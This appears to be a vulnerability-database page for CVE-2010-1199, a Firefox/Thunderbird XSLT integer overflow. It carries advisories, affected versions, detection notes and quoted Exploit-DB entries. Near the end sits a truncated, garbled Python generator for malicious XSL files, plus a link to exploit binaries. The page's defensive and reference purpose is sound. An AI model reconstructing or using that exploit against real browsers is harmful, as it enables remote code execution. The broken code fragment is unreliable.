CVE-2010-1199
Published 2010-06-24
CVE-2010-1199: Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey…
Priority: P354 · critical · 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 11.42% (95.5th percentile)
Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey before 2.0.5 allows remote attackers to execute arbitrary code via a large text value for a node.
Affected
89 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | firefox | — | — |
| mozilla | seamonkey | <= 2.0.4 | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
| mozilla | seamonkey | — | — |
Detection & IOCs
- Exploit triggers integer overflow via an extremely large BlockCount value (2147483647) used to generate XSLT sort nodes with large text values, causing heap buffer overflow during XSLT node sorting.
- Exploit generates malicious XSL and XML files (abysssec.xsl / abyssssec.xml) delivered to the victim browser; monitor for creation or serving of these filenames.
- The vulnerability is triggered by a large text value for an XSLT sort node; network/content inspection for XSLT stylesheets containing xsl:sort elements with very large string data may indicate exploitation attempts.
- Affected versions: Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, SeaMonkey before 2.0.5. Red Hat Enterprise Linux 6 package 'firefox' is listed as Not Affected.
CVSS provenance
nvd · v2.0 · 9.3 CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_ubuntu · 10.0 CRITICAL
vendor_redhat · 9.3 CRITICAL
Ubuntu
Firefox and Xulrunner vulnerability
vendor_ubuntu·2010-07-26·CVSS 10.0
CVE-2010-2755 [CRITICAL] Firefox and Xulrunner vulnerability
Summary: Firefox could be made to run programs as your login if it opened a
specially crafted file or website.
USN-957-1 fixed vulnerabilities in Firefox and Xulrunner. Daniel Holbert
discovered that the fix for CVE-2010-1214 introduced a regression which did
not properly initialize a plugin pointer. If a user were tricked into
viewing a malicious site, a remote attacker could use this to crash the
browser or run arbitrary code as the user invoking the program.
(CVE-2010-2755)
This update fixes the problem.
Original advisory details:
It was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu·2010-07-23·CVSS 9.8
CVE-2008-5913 [CRITICAL] Firefox and Xulrunner vulnerabilities
Summary: Firefox could be made to run programs as your login if it opened a
specially crafted file or website.
USN-930-1 fixed vulnerabilities in Firefox and Xulrunner. This update
provides the corresponding updates for Ubuntu 9.04 and 9.10, along with
additional updates affecting Firefox 3.6.6.
Several flaws were discovered in the browser engine of Firefox. If a user
were tricked into viewing a malicious site, a remote attacker could use
this to crash the browser or possibly run arbitrary code as the user
invoking the program. (CVE-2010-1208, CVE-2010-1209, CVE-2010-1211,
CVE-2010-1212)
An integer overflow was discovered in how Firefox processed plugin
parameters. An attacker could exploit this to crash the browser or possibly
run arbitrary
Ubuntu
ant, apturl, Epiphany, gluezilla, gnome-python-extras, liferea, mozvoikko, OpenJDK, packagekit, ubufox, webfav, yelp update
vendor_ubuntu·2010-07-23·CVSS 10.0
[CRITICAL] ant, apturl, Epiphany, gluezilla, gnome-python-extras, liferea, mozvoikko, OpenJDK, packagekit, ubufox, webfav, yelp update
Summary: This update is for use with the new Xulrunner provided in USN-930-4.
USN-930-4 fixed vulnerabilities in Firefox and Xulrunner on Ubuntu 9.04 and
9.10. This update provides updated packages for use with Firefox 3.6 and
Xulrunner 1.9.2.
Original advisory details:
It was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. This issue only affected
Ubuntu 8.04 LTS. (CVE-2010-1121)
Several flaws were discovered in the browser engine of Firefox. If a
user
Ubuntu
Thunderbird vulnerabilities
vendor_ubuntu·2010-07-06·CVSS 10.0
CVE-2010-1199 [CRITICAL] Thunderbird vulnerabilities
Martin Barbella discovered an integer overflow in an XSLT node sorting
routine. An attacker could exploit this to overflow a buffer and cause a
denial of service or possibly execute arbitrary code with the privileges of
the user invoking the program. (CVE-2010-1199)
An integer overflow was discovered in Thunderbird. If a user were tricked
into viewing malicious content, an attacker could overflow a buffer and
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2010-1196)
Several flaws were discovered in the browser engine of Thunderbird. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
pr
Ubuntu
Firefox regression
vendor_ubuntu·2010-06-30·CVSS 10.0
[CRITICAL] Firefox regression
Summary: This update fixes a problem with Firefox not installing alongside the old
Firefox 2 package.
USN-930-1 fixed vulnerabilities in Firefox. Due to a software packaging
problem, the Firefox 3.6 update could not be installed when the firefox-2
package was also installed. This update fixes the problem and updates
apturl for the change.
Original advisory details:
It was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. This issue only affected
Ubuntu 8.04 LTS. (CVE-2010-1121)
Several flaws were discovered in the browser engine of Firefox. If a
user were tr
Ubuntu
Firefox and Xulrunner vulnerabilities
vendor_ubuntu·2010-06-29·CVSS 10.0
CVE-2010-1121 [CRITICAL] Firefox and Xulrunner vulnerabilities
Summary: Firefox could be made to run programs as your login if it opened a
specially crafted file or website.
It was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. This issue only affected
Ubuntu 8.04 LTS. (CVE-2010-1121)
Several flaws were discovered in the browser engine of Firefox. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. (CVE-2010-1200, CVE-2010-1201,
CVE-2010-1202, CVE-2010-1203)
A
Ubuntu
apturl, Epiphany, gecko-sharp, gnome-python-extras, liferea, rhythmbox, totem, ubufox, yelp update
vendor_ubuntu·2010-06-29·CVSS 10.0
[CRITICAL] apturl, Epiphany, gecko-sharp, gnome-python-extras, liferea, rhythmbox, totem, ubufox, yelp update
Summary: This update is for use with the new Xulrunner provided in USN-930-1.
USN-930-1 fixed vulnerabilities in Firefox and Xulrunner. This update
provides updated packages for use with Firefox 3.6 and Xulrunner 1.9.2 on
Ubuntu 8.04 LTS.
Original advisory details:
It was discovered that Firefox could be made to access freed memory. If a
user were tricked into viewing a malicious site, a remote attacker could
cause a denial of service or possibly execute arbitrary code with the
privileges of the user invoking the program. This issue only affected
Ubuntu 8.04 LTS. (CVE-2010-1121)
Several flaws were discovered in the browser engine of Firefox. If a
user were tricked into viewing a m
Red Hat
Mozilla Integer Overflow in XSLT Node Sorting
vendor_redhat·2010-06-22·CVSS 9.3
CVE-2010-1199 [CRITICAL] CWE-190 Mozilla Integer Overflow in XSLT Node Sorting
Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey before 2.0.5 allows remote attackers to execute arbitrary code via a large text value for a node.
Package: firefox (Red Hat Enterprise Linux 6) - Not affected
GHSA
GHSA-gf95-pc3w-rmh9: Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3
ghsa_unreviewed·2022-05-02
CVE-2010-1199 [HIGH] GHSA-gf95-pc3w-rmh9: Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3
Integer overflow in the XSLT node sorting implementation in Mozilla Firefox 3.5.x before 3.5.10 and 3.6.x before 3.6.4, Thunderbird before 3.0.5, and SeaMonkey before 2.0.5 allows remote attackers to execute arbitrary code via a large text value for a node.
No detection rules found.
Exploit-DB
Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution
exploitdb·2010-09-09·CVSS 9.3
CVE-2010-1199 [CRITICAL] Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _
Beatles
"""
BlockCount = 43000
count = 1
while(count\n"
count = count + 1
myStyle = myStyle +"""
"""
cssFile = open("abysssec.xsl","w")
cssFile.write(myStyle)
cssFile.close()
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _
"""
block = """
"""
BlockCount = 2147483647
rowCount=10
#myStyle = myStyle + "\n"
count = 1
while(count
"""
myStyle = myStyle + " "+"A"*rowCount+"\n"
myStyle = myStyle + """
Lennon
"""
myStyle = myStyle + " "+"B"*rowCount+"\n"
myStyle = myStyle + """ McCartney
"""
myStyle = myStyle + " "+"C"*rowCou
Exploit-DB
Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow
exploitdb·2010-06-22
CVE-2010-1199 Mozilla Firefox/Thunderbird/SeaMonkey - XSLT Integer Overflow
---
source: https://www.securityfocus.com/bid/41082/info
Mozilla Firefox, SeaMonkey, and Thunderbird are prone to a remote integer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code in the context of the user running an affected application. Failed exploit attempts will likely result in denial-of-service conditions.
These issues are fixed in:
Firefox 3.6.4
Firefox 3.5.10
Thunderbird 3.0.5
SeaMonkey 2.0.5
NOTE: This issue was previously covered in BID 41050 (Mozilla Firefox/Thunderbird/SeaMonkey MFSA 2010-26/27/28/29/30/32 Remote Vulnerabilities) but has been given its own record to better document it.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34192.